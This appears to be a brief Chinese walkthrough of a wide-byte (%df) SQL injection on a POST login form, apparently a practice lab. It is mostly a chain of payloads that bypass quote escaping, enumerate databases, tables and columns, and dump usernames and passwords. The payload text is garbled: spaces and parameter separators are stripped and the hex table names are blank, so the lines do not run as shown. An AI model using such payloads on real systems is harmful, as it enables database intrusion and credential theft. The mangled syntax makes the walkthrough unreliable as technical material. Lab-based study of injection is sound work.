通过界面显示可知需要使用post进行注入,使用burp进行抓包
查找注入点
uname=aor1=1passwd=adminsubmit=Submit
查看提醒被转义
加上%df,报错
进行注释,成功,说明存在注入
uname=a%dfor1=1#passwd=adminsubmit=Submit
查看列数
uname=a%dforderby2#passwd=adminsubmit=Submit
为3时报错,说明存在2列
查看当前库
uname=a%dfunionselect1,database()#passwd=adminsubmit=Submit
查看所有库
uname=a%dfunionselect1,group_concat(schema_name)frominformation_schema.schemata#passwd=adminsubmit=Submit
查看所有表
uname=a%dfunionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=0x#passwd=adminsubmit=Submit
查看所有字段
uname=a%dfunionselect1,group_concat(column_name)frominformation_schema.columnswheretable_name=0x#passwd=adminsubmit=Submit
查看所有账户和密码
uname=a%dfunionselect1,group_concat(concat_ws(0x7e,username,password))fromsecurity.users#passwd=adminsubmit=Submit
以此类推爆出所有数据。
声明本教程仅提供技术分享,不得用于非法用途利用此文所造成的任何直接或间接的损失,文章作者不承担任何责任网络安全你我他,维护安全靠大家预览时标签不可点收录于话题#个上一篇下一篇